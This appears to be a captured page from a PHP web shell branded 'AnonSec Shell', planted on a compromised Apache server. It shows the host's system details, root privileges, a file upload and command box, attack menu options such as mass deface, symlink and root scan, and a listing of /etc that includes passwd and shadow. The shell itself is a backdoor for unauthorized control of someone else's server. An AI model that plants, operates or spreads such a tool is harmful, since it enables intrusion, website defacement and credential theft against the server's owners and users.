AnonSec Shell
Server IP : 172.67.157.199  /  Your IP : 3.149.254.10   [ Reverse IP ]
Web Server : Apache
System : Linux 3692325a-ac93-3ed0-1e50-897ae3432556.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/chroot/etc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
August 28 2024 19:00:19
root / root
0755
ImageMagick-7
--
July 16 2024 17:07:24
root / root
0755
acpi
--
July 16 2024 17:07:20
root / root
0755
apk
--
July 16 2024 17:07:26
root / root
0755
busybox-paths.d
--
July 16 2024 17:07:19
root / root
0755
ca-certificates
--
July 16 2024 17:07:22
root / root
0755
conf.d
--
July 16 2024 17:07:25
root / root
0755
crontabs
--
July 16 2024 17:07:19
root / root
0755
fonts
--
July 16 2024 17:07:23
root / root
0755
init.d
--
July 16 2024 17:07:25
root / root
0755
lbu
--
July 16 2024 17:07:20
root / root
0755
local.d
--
July 16 2024 17:07:19
root / root
0755
logrotate.d
--
July 16 2024 17:07:19
root / root
0755
modprobe.d
--
July 16 2024 17:07:19
root / root
0755
modules-load.d
--
July 16 2024 17:07:19
root / root
0755
network
--
July 16 2024 17:07:19
root / root
0755
opt
--
July 16 2024 17:07:19
root / root
0755
periodic
--
July 16 2024 17:07:19
root / root
0755
pkcs11
--
July 16 2024 17:07:23
root / root
0755
profile.d
--
July 16 2024 17:07:25
root / root
0755
runlevels
--
July 16 2024 17:07:19
root / root
0755
secfixes.d
--
July 16 2024 17:07:20
root / root
0755
ssl
--
July 16 2024 17:07:20
root / root
0755
ssl1.1
--
July 16 2024 17:07:20
root / root
0755
sysctl.d
--
July 16 2024 17:07:19
root / root
0755
terminfo
--
July 16 2024 17:07:22
root / root
0755
alpine-release
0.007 KB
June 18 2024 15:11:23
root / root
0644
ca-certificates.conf
5.812 KB
March 15 2024 11:46:14
root / root
0644
fstab
0.087 KB
May 09 2023 14:21:47
root / root
0644
group
0.681 KB
May 09 2023 14:21:47
root / root
0644
hostname
0.01 KB
May 09 2023 14:21:47
root / root
0644
hosts
0.077 KB
May 09 2023 14:21:47
root / root
0644
inittab
0.557 KB
May 09 2023 14:21:47
root / root
0644
inputrc
1.707 KB
April 11 2023 16:01:21
root / root
0644
issue
0.053 KB
June 18 2024 15:11:23
root / root
0644
krb5.conf
0.439 KB
March 02 2020 17:55:07
root / root
0644
mdev.conf
3.568 KB
May 09 2023 13:50:00
root / root
0644
modules
0.015 KB
May 09 2023 14:21:47
root / root
0644
motd
0.277 KB
May 09 2023 14:21:47
root / root
0644
msmtprc
0.077 KB
July 16 2024 16:09:36
root / root
0644
nsswitch.conf
0.2 KB
May 09 2023 14:21:47
root / root
0644
os-release
0.184 KB
June 18 2024 15:11:23
root / root
0644
passwd
0.097 KB
September 19 2024 21:43:07
root / root
0644
profile
0.928 KB
May 09 2023 14:21:47
root / root
0644
protocols
3.07 KB
May 09 2023 14:21:47
root / root
0644
rc.conf
12.946 KB
July 06 2023 19:15:37
root / root
0644
resolv.conf
0.063 KB
September 17 2024 21:48:02
root / root
0644
securetty
0.096 KB
June 12 2024 11:52:11
root / root
0644
services
12.513 KB
May 09 2023 14:21:47
root / root
0644
shadow
0.411 KB
May 09 2023 14:21:47
root / shadow
0640
shells
0.037 KB
May 09 2023 14:21:47
root / root
0644
sysctl.conf
0.052 KB
May 09 2023 14:21:47
root / root
0644
udhcpd.conf
5.504 KB
June 12 2024 11:52:11
root / root
0644

Anon7 - 2022
AnonSec Team